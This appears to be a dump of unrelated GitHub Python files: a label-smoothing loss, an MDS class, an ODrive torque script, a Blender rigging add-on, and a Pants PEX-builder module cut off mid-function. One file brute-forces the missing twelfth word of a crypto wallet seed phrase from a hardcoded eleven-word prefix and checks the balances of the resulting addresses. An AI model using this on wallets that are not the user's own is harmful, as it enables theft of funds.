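    # (Editor's worked example, illustrative only: with n_classes=3 and smoothing=0.1,\n    #  a target class of 1 becomes the vector [0.05, 0.9, 0.05] -- off-target entries\n    #  get smoothing/(n_classes-1) and the target entry gets 1-smoothing.)\n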
    def forward(self, inputs, targets):\n        targets = LabelSmoothCrossEntropyLoss._smooth_one_hot(targets, inputs.size(-1),\n                                                              self.smoothing)\n        lsm = F.log_softmax(inputs, -1)\n        if self.weight is not None:\n            lsm = lsm * self.weight.unsqueeze(0)\n        loss = -(targets * lsm).sum(-1)\n\n        if self.reduction == 'sum':\n            loss = loss.sum()\n\n        elif self.reduction == 'mean':\n            loss = loss.mean()\n        return loss\n\nclass SmoothCrossEntropyLoss(_WeightedLoss):\n    def __init__(self, weight=None, reduction='mean', smoothing=0.1):\n        super().__init__(weight=weight, reduction=reduction)\n        self.smoothing = smoothing\n        self.weight = weight\n        self.reduction = reduction\n\n    def k_one_hot(self, targets: torch.Tensor, n_classes: int, smoothing=0.0):\n        with torch.no_grad():\n            targets = torch.empty(size=(targets.size(0), n_classes),\n                                  device=targets.device) \\\n                .fill_(smoothing / (n_classes-1)) \\\n                .scatter_(1, targets.data.unsqueeze(1), 1.-smoothing)\n        return targets\n\n    def reduce_loss(self, loss):\n        return loss.mean() if self.reduction == 'mean' else loss.sum() \\\n            if self.reduction == 'sum' else loss\n\n    def forward(self, inputs, targets):\n        assert 0 <= self.smoothing < 1\n\n        targets = self.k_one_hot(targets, inputs.size(-1), self.smoothing)\n        log_preds = F.log_softmax(inputs, -1)\n\n        if self.weight is not None:\n            log_preds = log_preds * self.weight.unsqueeze(0)\n\n        return self.reduce_loss(-(targets * log_preds).sum(dim=-1))\n\n\nclass MyLoss2(LabelSmoothCrossEntropyLoss):\n    def __init__(self, weights=None):\n        super(MyLoss2, self).__init__()\n        self.weights = weights\n\n    def forward(self, output, label):\n        celoss = LabelSmoothCrossEntropyLoss(weight=self.weights, reduction='mean')\n        loss = celoss(output, label)\n        return loss\n\nif __name__ == '__main__':\n    nSamples = [887, 6130, 480, 317, 972, 101, 128]\n    normedWeights = [1 - (x / sum(nSamples)) for x in nSamples]\n    normedWeights = torch.FloatTensor(normedWeights)\n    print(normedWeights)\n","repo_name":"youngjun0627/image_classification","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32521539610","text":"#MDS - multi dimensional scaling\n#dries.wijns[@]gmail.com\nimport math\nimport random\nimport copy\n\n\"\"\"\n    import pylab as p\n    \n    def testSimple():\n        distanceMatrix = list( [[0,1,1,1],\n                                [4,0,1,1],\n                                [1,9,0,1],\n                                [3,1,1,0]] )\n        points = MDS(distanceMatrix).points()\n        plot(points)\n        exit()\n    \n    def plot(points):\n        x = [point[0] for point in points]\n        y = [point[1] for point in points]\n        \n        p.plot(x,y, 'ro')\n        p.show()\n    \"\"\"\n\nclass MDS:\n    \"\"\"Multi-dimensional scaling:\n    \n    input: distanceMatrix = n*n matrix with the distances between the points,\n           diagonal elements must be zero,\n           only lower triangle is required (upper triangle will be ignored).\n    \n    output: list with 2D-points: [[x1,y1],[x2,y2],...,[xn,yn]]\n    \"\"\"\n    distanceMatrix = list(list())\n    \n    def __init__(self, distanceMatrix):\n        if self.checkDistanceMatrix(distanceMatrix):\n            self.distanceMatrix = distanceMatrix\n    \n    def initPoints(self):\n        \"\"\"First guess is on a straight line, spaced 1 apart\"\"\"\n        points = list()\n        for i in range(len(self.distanceMatrix)):\n            x = i\n            y = 0\n            points.append([x,y])\n        return points\n    \n    def checkDistanceMatrix(self, m):\n        for i in range(len(m)):\n            if m[i][i] != 0:  #diagonal elements must be zero\n                return False\n        #loop over all elements under diagonal\n        for j in range(len(m)):\n            for k in range(j+1):\n                if m[j][k] < 0:\n                    return False  #distances must be non-negative\n        \n        return True\n    \n
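    # (Editor's illustrative sketch, not original code:\n    #  mds = MDS([[0, 1, 2], [1, 0, 1], [2, 1, 0]])\n    #  layout = mds.points()  # hill-climbs toward 2D coordinates matching the distances)\n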
    def distance(self, p1, p2):\n        return math.sqrt((p2[0]-p1[0])**2+(p2[1]-p1[1])**2)  # Euclidean distance between 2 points in 2D\n    \n    def zeros(self, n):\n        return [[0 for _ in range(n)] for _ in range(n)]\n    \n    def createDistanceMatrix(self, points):\n        m = self.zeros(len(points))\n        for j in range(len(points)):\n            for k in range(j+1):\n                m[j][k] = self.distance(points[j], points[k])\n        return m\n    \n    def score(self, points):\n        \"\"\"Sum of squared errors between the distances of the given points and the distanceMatrix\"\"\"\n        s = 0\n        for j in range(len(points)):\n            for k in range(j+1):\n                s += (self.distance(points[j], points[k]) - self.distanceMatrix[j][k])**2\n        return s\n    \n    def mutate(self, points):\n        #select a random point to mutate\n        p = random.randint(0, len(points)-1)\n        #select a random angle in which to mutate (in radians)\n        a = random.random() * math.pi\n        #select a random direction in which to mutate\n        d = random.choice([-1, 1])\n        #select a random length to mutate\n        l = random.choice(self.frange(0.1, 10, 0.1))\n        \n        #apply mutation\n        points[p][0] += d*math.cos(a)*l\n        points[p][1] += d*math.sin(a)*l\n        \n        return points\n    \n    def frange(self, start, stop, inc):\n        l = list()\n        i = start\n        while i <= stop:\n            l.append(i)\n            i += inc\n        return l\n    \n    def points(self):\n        numberOfRounds = 9999\n        \n        topFive = [self.initPoints()]\n        \n        for i in range(numberOfRounds):\n            topFiveCopy = copy.deepcopy(topFive)\n            for item in topFive:\n                topFiveCopy.append(self.mutate(item))\n            topFive = self.selectTopFive(topFiveCopy)\n        \n        return topFive[0]\n    \n    def selectTopFive(self, l):\n        sortedl = sorted(l, key=self.score)\n        return sortedl[0:5]\n\nif __name__ == \"__main__\":\n    #testSimple()\n    pass\n","repo_name":"ezegarra/microbrowser","sub_path":"setup/python/mds.py","file_name":"mds.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15658475854","text":"import time\nimport odrive as o\nfrom odrive.enums import *\n\n\ndef main():\n    print(\"Finding an ODRIVE...\")\n    m = o.find_any()\n    m1 = m.axis1\n    print(\"ODRIVE Connected...\")\n\n    m1.controller.input_torque = 0.0\n    m1.controller.config.control_mode = CONTROL_MODE_TORQUE_CONTROL\n    m1.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL\n\n    while True:\n        t = float(input(\"Input Torque Value T, 0<=T<=1: \\n\"))\n        if 0.0 <= t <= 1.0:\n            break\n    m1.controller.input_torque = t\n    time.sleep(5)\n    m1.controller.input_torque = 0.0\n\n\nmain()\n\n# Resources: https://github.com/but-i-love-pbj/odrive/blob/master/motor.py\n# Resources: https://python.hotexamples.com/examples/odrive/-/find_any/python-find_any-function-examples.html\n","repo_name":"EricYYang2022/RDS2022-Wand","sub_path":"1-DOF Prototype/ODRIVE/Motor Initial Setup/torque_command.py","file_name":"torque_command.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7835003416","text":"#!
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndebug = False\n\nimport requests\nfrom mnemonic import Mnemonic\nfrom bip32utils import BIP32Key\nfrom eth_keys import keys\nfrom eth_utils import to_checksum_address\n\n# Conditional import of var_dump\nif debug:\n    from var_dump import var_dump\n\n# Split the mnemonic into two parts; remember the trailing space in the prefix (or the leading space in the suffix)\nprefix_mnemonic = \"liberty river current obey box soldier now gather dismiss penalty subway \"\nsuffix_mnemonic = \"\"\n\n# The list of 2048 BIP-39 words\nwordlist = Mnemonic(\"english\").wordlist\n\n# Constant for hardened keys\nHARDENED = 0x80000000\n\n# API key for polygonscan.com; get a free one at https://polygonscan.com/myapikey\nAPI_KEY = \"\"\n\n# Find the missing mnemonic word\nfor word in wordlist:\n    try:\n        mnemonic = prefix_mnemonic + word + suffix_mnemonic\n        if debug:\n            var_dump(mnemonic)\n        if Mnemonic(\"english\").check(mnemonic):\n            print(f\"Found a matching 12th word: {word}\")\n            \n            # Derive the private key and Ethereum address according to BIP-44\n            seed = Mnemonic.to_seed(mnemonic)\n            root_key = BIP32Key.fromEntropy(seed)\n            child_key = root_key.ChildKey(44 + HARDENED).ChildKey(60 + HARDENED).ChildKey(0 + HARDENED).ChildKey(0).ChildKey(0)\n            private_key_bytes = child_key.PrivateKey()\n            private_key = keys.PrivateKey(private_key_bytes)\n            address = to_checksum_address(private_key.public_key.to_address())\n\n            print(f\"Ethereum address: {address}\")\n            \n            # Check the account balance on polygonscan.com\n            response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=balance&address={address}&tag=latest&apikey={API_KEY}\")\n            balance = response.json().get(\"result\", \"0\")\n            print(f\"Balance: {int(balance) / 10**18} MATIC\")\n            \n            # Check ERC-20 tokens\n            response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=tokentx&address={address}&startblock=0&endblock=99999999&sort=asc&apikey={API_KEY}\")\n            erc20_tokens = response.json().get(\"result\", [])\n            if erc20_tokens:\n                print(\"ERC-20 tokens:\")\n                for token in erc20_tokens:\n                    print(f\"Token: {token['tokenName']}, Symbol: {token['tokenSymbol']}, Amount: {int(token['value']) / 10**int(token['tokenDecimal'])}\")\n            else:\n                print(\"No ERC-20 tokens.\")\n            \n            # Check ERC-721 tokens\n            response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=tokennfttx&address={address}&startblock=0&endblock=99999999&sort=asc&apikey={API_KEY}\")\n            erc721_tokens = response.json().get(\"result\", [])\n            if erc721_tokens:\n                print(\"ERC-721 tokens:\")\n                for token in erc721_tokens:\n                    print(f\"Token: {token['tokenName']}, Symbol: {token['tokenSymbol']}, Token ID: {token['tokenID']}\")\n            else:\n                print(\"No ERC-721 tokens.\")\n\n            # Check ERC-1155 tokens\n            response = requests.get(f\"https://api.polygonscan.com/api?module=account&action=token1155tx&address={address}&startblock=0&endblock=99999999&sort=asc&apikey={API_KEY}\")\n            erc1155_tokens = response.json().get(\"result\", [])\n            if erc1155_tokens:\n                print(\"ERC-1155 tokens:\")\n                for token in erc1155_tokens:\n                    token_value = token.get('value', 'Unknown amount')  # Use get() with a default value\n                    print(f\"Token: {token['tokenName']}, Symbol: {token['tokenSymbol']}, Token ID: {token['tokenID']}, Amount: {token_value}\")\n            else:\n                print(\"No ERC-1155 tokens.\")\n    except requests.RequestException as e:\n        print(f\"Error while connecting to the API: {e}\")\n    except Exception as e:\n        print(f\"Unexpected error: 
{e}\")\n","repo_name":"kolos666/crack12wordofrutilicus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11542673452","text":"VERSION = (0, 0, 4)\n\nimport bpy\n\n## buttons for now are squatting on the \"chain links\" (constraints) icon tab\nPREFIX = \"constraint\"\n# other ideas: scene | object | physics | data | world | render | render_layers\n\n##############################################################################\n### FIXING DOTS IN OBJECT/MESH/ETC NAMES\n\ndef _dedotify(id, stuff):\n affected = []\n for _, m in enumerate(stuff):\n #console.warn(\"%s[%d]: %s\" % (str(id), _, str(m and m.name)));\n if m and \".\" in m.name:\n console.warn(\"%s[%d] fixing name: %s\" % (str(id), _, str(m.name)));\n m.name = m.name.replace(\".\",\"_\")\n affected.append(m)\n return affected\n \nclass FixDotsInNames(bpy.types.Operator):\n \"\"\" . -> _ \"\"\"\n bl_idname = PREFIX + \".fix_dots_in_names\"\n bl_label = \"Replaces dots with underscores\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n # note: certain things don't appear to be mutable unless OBJECT mode is selected\n bpy.ops.object.mode_set(mode='OBJECT')\n\n affected = []\n affected += _dedotify(\"objects\", bpy.data.objects)\n affected += _dedotify(\"meshes\", bpy.data.meshes)\n affected += _dedotify(\"materials\", bpy.data.materials)\n affected += _dedotify(\"textures\", bpy.data.textures)\n affected += _dedotify(\"armatures\", bpy.data.armatures)\n\n msg = YELL(affected, prefix=\"renamed\")\n\n if bpy.context.scene.fufbx_show_popup:\n # this pops up a little alert box near the mouse\n self.report({'ERROR'}, msg)\n else:\n # this displays in the menu bar area\n self.report({'INFO'}, \"{0}: {1:d} things affected\".format(\"._:\", len(affected)))\n\n return {'FINISHED'}\n\n##############################################################################\n## BONE REROLLING\n\ndef _selectBonesinEditMode(reg):\n \"\"\" pass an uncompiled regex-like string in to select those bones \"\"\"\n if bpy.context.mode != 'OBJECT':\n bpy.ops.object.mode_set(mode='OBJECT')\n bpy.ops.object.select_all(action='DESELECT')\n\n # select the first visible object with an armature\n obj = [o for o in bpy.context.visible_objects\n if isinstance(o.data, bpy.types.Armature)\n ][0]\n armature = obj.data\n console.info(\"armature: \"+str(armature))\n console.warn(\"object: \"+str(obj))\n\n # the active object determines the EDIT target\n bpy.context.scene.objects.active = obj\n\n # also needs to be \"selected\"\n obj.select = True\n \n bpy.ops.object.mode_set(mode='EDIT')\n\n assert(bpy.context.mode == 'EDIT_ARMATURE')\n\n if bpy.context.scene.fufbx_restore_selection:\n # having a bone selected is useful to see the color normal,\n # so attempt to restore selection after we're done\n previous = {\n 'head': [b for b in armature.edit_bones if b.select_head],\n 'tail': [b for b in armature.edit_bones if b.select_tail],\n 'bone': [b for b in armature.edit_bones if b.select],\n 'length': -1\n }\n previous['length'] = (\n len(previous['head']) +\n len(previous['tail']) +\n len(previous['bone'])\n )\n def restore():\n if previous and previous['length']:\n bpy.ops.armature.select_all(action='DESELECT')\n for b in previous['bone']:\n b.select = True\n for b in previous['head']:\n b.select_head = True\n for b in previous['tail']:\n b.select_tail = True\n restore_selection = restore\n else:\n restore_selection = 
False\n \n # clear any selected bones\n bpy.ops.armature.select_all(action='DESELECT')\n\n affected = []\n\n import re\n regex = re.compile(reg, re.IGNORECASE)\n\n # should this be limited to only deform bones??\n deforms = [b for b in armature.edit_bones if b.use_deform]\n for b in deforms:\n if regex.search(b.name):\n affected.append(b)\n b.select_head = True\n b.select = True\n b.select_tail = True\n return affected, restore_selection\n\n# make _selectBonesinEditMode reachable to debug from the Python Console\nsetattr(bpy.utils, '_selectBonesinEditMode', _selectBonesinEditMode)\n\ndef safe_calculate_roll(type='GLOBAL_NEG_Z'):\n try:\n bpy.ops.armature.calculate_roll(type=type)\n except:\n # earlier blender versions only have one 'Z' not GLOBAL_NEG/POS...\n bpy.ops.armature.calculate_roll(type=type[-1])\n \nclass ArmsAndHands(bpy.types.Operator):\n bl_label = \"Arms and Hands Roll -Z Global\"\n axis = bpy.props.StringProperty(default=\"GLOBAL_NEG_Z\")\n\n bl_idname = PREFIX + \".fix_arms_and_hands\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n affected, restore_selection = _selectBonesinEditMode( \"arm|hand|palm\" )\n\n if self.axis == 'ZERO':\n [ setattr(b,'roll',0) for b in affected ]\n else:\n safe_calculate_roll(type=self.axis)\n\n affected = [ u\"{1:+.1f}\\u00B0 {0}\".format(b.name, b.roll) for b in affected]\n msg = YELL(affected, prefix=self.axis)\n \n if bpy.context.scene.fufbx_show_popup:\n # digits are too much noise (do they even need to be rolled here?)\n import re\n msg2 = \"\\n\".join([\n m for m in msg.split(\"\\n\")\n if not re.search(r\"hand..\", m, re.IGNORECASE)\n ])\n if msg != msg2:\n msg2 += \"\\n(and fingers)\"\n # this pops up a little alert box near the mouse\n self.report({'ERROR'}, msg2)\n else:\n # this displays in the menu bar area\n self.report({'INFO'}, \"{0}: {1:d} bones affected\".format(self.axis, len(affected)))\n\n restore_selection and restore_selection()\n\n return {'FINISHED'}\n\nclass LegsAndCenterOfMass(bpy.types.Operator):\n bl_label = \"Legs and Center of Mass (Hips, Spine, Neck, Head) Roll -Y Global\"\n axis = bpy.props.StringProperty(default=\"GLOBAL_NEG_Y\")\n\n bl_idname = PREFIX + \".fix_legs_and_cmass\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n affected, restore_selection = _selectBonesinEditMode( \"leg|hips|spine|neck|head|face|thigh|shin\" )\n\n if self.axis == 'ZERO':\n [ setattr(b,'roll',0) for b in affected ]\n else:\n safe_calculate_roll(type=self.axis)\n\n affected = [ u\"{1:+.1f}\\u00B0 {0}\".format(b.name, b.roll) for b in affected]\n msg = YELL(affected, prefix=self.axis)\n\n if bpy.context.scene.fufbx_show_popup:\n # this pops up a little alert box near the mouse\n self.report({'ERROR'}, msg)\n else:\n # this displays in the menu bar area\n self.report({'INFO'}, \"{0}: {1:d} bones affected\".format(self.axis, len(affected)))\n\n restore_selection and restore_selection()\n\n return {'FINISHED'}\n\n##############################################################################\n## the actual new panel with the buttons for triggering stuff\n\nclass FUFBXPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the \"\"\"+PREFIX+\"\"\" context of the properties editor\"\"\"\n _version = \".\".join([str(x) for x in VERSION])\n bl_label = \"FUFBX (Functional User FBX) v\" + _version\n bl_idname = PREFIX.upper() + \"_PT_fufbx\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = PREFIX\n \n bpy.types.Scene.fufbx_show_popup = bpy.props.BoolProperty(name = \"show_popup\", 
default = True)\n bpy.types.Scene.fufbx_restore_selection = bpy.props.BoolProperty(name = \"restore_selection\", default = False)\n\n blender_version = bpy.app.version[0]+bpy.app.version[1]/100.0\n \n def __init__(self, *args, **kw):\n super(FUFBXPanel, self).__init__(*args, **kw)\n \n def draw(self, context):\n layout = self.layout\n if self.blender_version < 2.74:\n layout.label(text=\"!!! NOTE: this was designed for blender 2.74+ only\")\n\n layout.prop(bpy.context.scene, property='fufbx_show_popup', text=\"verbose mode\")\n layout.prop(bpy.context.scene, property='fufbx_restore_selection', text=\"restore bone selection\")\n\n layout.label(text=\"Hacks:\")\n\n split = layout.split()\n col = split.column()\n \n col.operator(PREFIX+\".fix_dots_in_names\")\n\n layout.label(text=\"Center of Mass:\")\n layout.operator(PREFIX+\".fix_legs_and_cmass\")\n split = layout.split()\n for _ in ['X','Y','Z']:\n col = split.column()\n col.operator(PREFIX+\".fix_legs_and_cmass\",text=\"-\"+_).axis = 'GLOBAL_NEG_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_legs_and_cmass\",text=\"+\"+_).axis = 'GLOBAL_POS_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_legs_and_cmass\",text=u\"0\\u00B0\").axis = 'ZERO'\n\n layout.label(text=\"Arms and Hands:\")\n layout.operator(PREFIX+\".fix_arms_and_hands\")\n split = layout.split()\n for _ in ['X','Y','Z']:\n col = split.column()\n col.operator(PREFIX+\".fix_arms_and_hands\",text=\"-\"+_).axis = 'GLOBAL_NEG_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_arms_and_hands\",text=\"+\"+_).axis = 'GLOBAL_POS_'+_\n col = split.column()\n col.operator(PREFIX+\".fix_arms_and_hands\",text=u\"0\\u00B0\").axis = 'ZERO'\n\n\n##############################################################################\n## module stuff\n\ndef register():\n try:\n unregister()\n except:\n pass\n print(\"registering ui_panel\")\n bpy.utils.register_module(__name__)\n\ndef unregister():\n print(\"unregistering ui_panel\")\n bpy.utils.unregister_module(__name__)\n\n\n##############################################################################\n## console-lack hackery...\n\n## i'm experimenting with various ways to provide user feedback notices\n## (... 
blender has no great way of doing this, for years now)\n\ndef YELL(affected, **kw):\n    prefix = kw.get(\"prefix\", \"affected\")\n    empty = kw.get(\"empty\", \"(nothing affected)\")\n    \n    # this outputs above the main menu (to Blender's hidden log output pane!)\n    [ console.info(str(x)) for x in affected ]\n\n    if len(affected):\n        msg = prefix + \":\\n \" + (\"\\n \".join([str(x) for x in affected]))\n    else:\n        msg = empty\n\n    return msg\n\nclass upper_console_output(bpy.types.Operator):\n    bl_idname = 'render.upper_console_output'\n    bl_label = 'WarnOutput'\n    bl_options = {'REGISTER'}\n    text = bpy.props.StringProperty()\n    level = bpy.props.StringProperty(default=\"INFO\")\n    def execute(self, context):\n        self.report({self.level.upper()}, str(self.text))\n        return {'FINISHED'}\n\ndef _logit(*args, **kw):\n    level = kw.get('level', 'INFO')\n    print(\"[\" + str(level) + \"]\" + str(args))  # also log to stdout\n    try:\n        bpy.ops.render.upper_console_output(text=str(args), level=level)\n    except AttributeError:\n        bpy.utils.register_class(upper_console_output)\n        bpy.ops.render.upper_console_output(text=str(args), level=level)\n\nclass console:\n    bl_options = set()\n    # plain functions on purpose (no self/cls): console.info(\"msg\") forwards the args straight to _logit\n    def debug(*args):\n        _logit(*args, level='DEBUG')\n    def info(*args):\n        _logit(*args, level='INFO')\n    def operator(*args):\n        _logit(*args, level='OPERATOR')\n    def warn(*args):\n        _logit(*args, level='WARNING')\n    def error(*args):\n        _logit(*args, level='ERROR')\n\n## auto-register when run as a direct script in the text editor view\nif __name__ == \"__main__\":\n    register()\n","repo_name":"humbletim/hifi-aux","sub_path":"examples/blender-fbx-ui-panel/fufbx_ui_panel.py","file_name":"fufbx_ui_panel.py","file_ext":"py","file_size_in_byte":11680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27762367489","text":"import json\nimport logging\nimport os\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom typing import Callable, Dict, List, Optional, Sequence, Set, Tuple\n\nfrom pex.interpreter import PythonIdentity, PythonInterpreter\nfrom pex.pex_builder import PEXBuilder\nfrom pex.pex_info import PexInfo\nfrom pex.platforms import Platform\nfrom pex.resolver import resolve\nfrom pex.util import DistributionHelper\nfrom pex.version import __version__ as pex_version\nfrom pkg_resources import Distribution, get_provider\n\nfrom pants.backend.python.subsystems.ipex import ipex_launcher\nfrom pants.backend.python.targets.python_binary import PythonBinary\nfrom pants.backend.python.targets.python_distribution import PythonDistribution\nfrom pants.backend.python.targets.python_library import PythonLibrary\nfrom pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary\nfrom pants.backend.python.targets.python_tests import PythonTests\nfrom pants.base.build_environment import get_buildroot\nfrom pants.base.exceptions import TaskError\nfrom pants.build_graph.files import Files\nfrom pants.build_graph.target import Target\nfrom pants.option.custom_types import UnsetBool\nfrom pants.python.python_repos import PythonRepos\nfrom pants.python.python_requirement import PythonRequirement\nfrom pants.python.python_setup import PythonSetup\nfrom pants.subsystem.subsystem import Subsystem\nfrom pants.util.collections import assert_single_element\nfrom pants.util.contextutil import temporary_file\nfrom pants.util.ordered_set import OrderedSet\nfrom pants.util.strutil import module_dirname\n\n\ndef is_python_target(tgt: Target) -> bool:\n    # We'd like to take all PythonTarget subclasses, but currently PythonThriftLibrary and\n    # PythonAntlrLibrary extend PythonTarget, and until we fix that (which we can't do until\n    # we remove the old python pipeline entirely) we want to ignore those target types here.\n    return isinstance(tgt, (PythonLibrary, PythonTests, PythonBinary))\n
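\n\n# (Editor's illustrative note, not original code: these predicates are plain filters,\n# e.g. python_tgts = [t for t in targets if is_python_target(t)].)\n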
\n\ndef has_python_sources(tgt: Target) -> bool:\n    return is_python_target(tgt) and tgt.has_sources()\n\n\ndef is_local_python_dist(tgt: Target) -> bool:\n    return isinstance(tgt, PythonDistribution)\n\n\ndef has_resources(tgt: Target) -> bool:\n    return isinstance(tgt, Files) and tgt.has_sources()\n\n\ndef has_python_requirements(tgt: Target) -> bool:\n    return isinstance(tgt, PythonRequirementLibrary)\n\n\ndef always_uses_default_python_platform(tgt: Target) -> bool:\n    return isinstance(tgt, PythonTests)\n\n\ndef may_have_explicit_python_platform(tgt: Target) -> bool:\n    return isinstance(tgt, PythonBinary)\n\n\ndef targets_by_platform(targets, python_setup):\n    targets_requiring_default_platforms = []\n    explicit_platform_settings = defaultdict(OrderedSet)\n    for target in targets:\n        if always_uses_default_python_platform(target):\n            targets_requiring_default_platforms.append(target)\n        elif may_have_explicit_python_platform(target):\n            for platform in target.platforms if target.platforms else python_setup.platforms:\n                explicit_platform_settings[platform].add(target)\n    # There are currently no tests for this because they're super platform specific and it's hard for\n    # us to express that on CI, but https://github.com/pantsbuild/pants/issues/7616 has an excellent\n    # repro case for why this is necessary.\n    for target in targets_requiring_default_platforms:\n        for platform in python_setup.platforms:\n            explicit_platform_settings[platform].add(target)\n    return dict(explicit_platform_settings)\n\n\ndef identify_missing_init_files(sources: Sequence[str]) -> Set[str]:\n    \"\"\"Return the set of paths that would need to be added to ensure that every package has an\n    __init__.py.\"\"\"\n    packages: Set[str] = set()\n    for source in sources:\n        if source.endswith(\".py\"):\n            pkg_dir = os.path.dirname(source)\n            if pkg_dir and pkg_dir not in packages:\n                package = \"\"\n                for component in pkg_dir.split(os.sep):\n                    package = os.path.join(package, component)\n                    packages.add(package)\n\n    return {os.path.join(package, \"__init__.py\") for package in packages} - set(sources)\n
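\n\n# (Editor's worked example, illustrative only: for sources [\"a/b/c.py\", \"a/__init__.py\"],\n# identify_missing_init_files returns {\"a/b/__init__.py\"}.)\n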
\n\nclass PexBuilderWrapper:\n    \"\"\"Wraps PEXBuilder to provide an API that consumes targets and other BUILD file entities.\"\"\"\n\n    class Factory(Subsystem):\n        options_scope = \"pex-builder-wrapper\"\n\n        @classmethod\n        def register_options(cls, register):\n            super(PexBuilderWrapper.Factory, cls).register_options(register)\n            # TODO: make an analogy to cls.register_jvm_tool that can be overridden for python subsystems\n            # by a python_requirement_library() target, not just via pants.ini!\n            register(\n                \"--setuptools-version\",\n                advanced=True,\n                default=\"40.6.3\",\n                fingerprint=True,\n                help=\"The setuptools version to include in the pex if namespace packages need \"\n                \"to be injected.\",\n            )\n            register(\n                \"--pex-version\",\n                advanced=True,\n                default=pex_version,\n                fingerprint=True,\n                help=\"The pex version to include in any generated ipex files. \"\n                \"NOTE: This should ideally be the same as the pex version which pants \"\n                f\"itself depends on, which right now is {pex_version}.\",\n            )\n\n        @classmethod\n        def subsystem_dependencies(cls):\n            return super(PexBuilderWrapper.Factory, cls).subsystem_dependencies() + (\n                PythonRepos,\n                PythonSetup,\n            )\n\n        @classmethod\n        def create(cls, builder, log=None, generate_ipex=False):\n            options = cls.global_instance().get_options()\n            setuptools_requirement = f\"setuptools=={options.setuptools_version}\"\n            pex_requirement = f\"pex=={options.pex_version}\"\n\n            log = log or logging.getLogger(__name__)\n\n            return PexBuilderWrapper(\n                builder=builder,\n                python_repos_subsystem=PythonRepos.global_instance(),\n                python_setup_subsystem=PythonSetup.global_instance(),\n                setuptools_requirement=PythonRequirement(setuptools_requirement),\n                pex_requirement=PythonRequirement(pex_requirement),\n                log=log,\n                generate_ipex=generate_ipex,\n            )\n\n    def __init__(\n        self,\n        builder: PEXBuilder,\n        python_repos_subsystem: PythonRepos,\n        python_setup_subsystem: PythonSetup,\n        setuptools_requirement: PythonRequirement,\n        pex_requirement: PythonRequirement,\n        log,\n        generate_ipex: bool = False,\n    ):\n        assert log is not None\n\n        self._builder = builder\n        self._python_repos_subsystem = python_repos_subsystem\n        self._python_setup_subsystem = python_setup_subsystem\n        self._setuptools_requirement = setuptools_requirement\n        self._pex_requirement = pex_requirement\n        self._log = log\n\n        self._distributions: Dict[str, Distribution] = {}\n        self._frozen = False\n\n        self._generate_ipex = generate_ipex\n        # If we generate a .ipex, we need to ensure all the code we copy into the underlying PEXBuilder\n        # is also added to the new PEXBuilder created in `._shuffle_original_build_info_into_ipex()`.\n        self._all_added_sources_resources: List[Path] = []\n        # If we generate a dehydrated \"ipex\" file, we need to make sure that it is aware of any special\n        # find_links repos attached to any single requirement, so it can later resolve those\n        # requirements when it is first bootstrapped, using the same resolve options.\n        self._all_find_links: OrderedSet[str] = OrderedSet()\n\n    def add_requirement_libs_from(self, req_libs, platforms=None):\n        \"\"\"Multi-platform dependency resolution for PEX files.\n\n        :param req_libs: A list of :class:`PythonRequirementLibrary` targets to resolve.\n        :param platforms: A list of :class:`Platform`s to resolve requirements for.\n            Defaults to the platforms specified by PythonSetup.\n        \"\"\"\n        reqs = [req for req_lib in req_libs for req in req_lib.requirements]\n        self.add_resolved_requirements(reqs, platforms=platforms)\n\n    class SingleDistExtractionError(Exception):\n        pass\n\n    def extract_single_dist_for_current_platform(self, reqs, dist_key) -> Distribution:\n        \"\"\"Resolve a specific distribution from a set of requirements matching the current platform.\n\n        :param list reqs: A list of :class:`PythonRequirement` to resolve.\n        :param str dist_key: The value of `distribution.key` to match for a `distribution` from the\n            resolved requirements.\n        :return: The single :class:`pkg_resources.Distribution` matching `dist_key`.\n        :raises: :class:`self.SingleDistExtractionError` if no dists or multiple dists matched the\n            given `dist_key`.\n        \"\"\"\n        distributions = self.resolve_distributions(reqs, platforms=[\"current\"])\n        try:\n
            matched_dist = assert_single_element(\n                dist for dists in distributions.values() for dist in dists if dist.key == dist_key\n            )\n        except (StopIteration, ValueError) as e:\n            raise self.SingleDistExtractionError(\n                f\"Exactly one dist was expected to match name {dist_key} in requirements {reqs}: {e!r}\"\n            )\n        return matched_dist\n\n    def resolve_distributions(\n        self, reqs: List[PythonRequirement], platforms: Optional[List[Platform]] = None,\n    ) -> Dict[str, List[Distribution]]:\n        \"\"\"Multi-platform dependency resolution.\n\n        :param reqs: A list of :class:`PythonRequirement` to resolve.\n        :param platforms: A list of platform strings to resolve requirements for.\n            Defaults to the platforms specified by PythonSetup.\n        :returns: A dict mapping each platform name to the list of distributions resolved for it,\n            covering all transitive requirements needed to resolve the initial given requirements\n            `reqs` for the given platforms.\n        \"\"\"\n        deduped_reqs = OrderedSet(reqs)\n        find_links: OrderedSet[str] = OrderedSet()\n        for req in deduped_reqs:\n            self._log.debug(f\"  Dumping requirement: {req}\")\n            self._builder.add_requirement(str(req.requirement))\n            if req.repository:\n                find_links.add(req.repository)\n\n        # Resolve the requirements into distributions.\n        distributions = self._resolve_multi(\n            self._builder.interpreter, list(deduped_reqs), 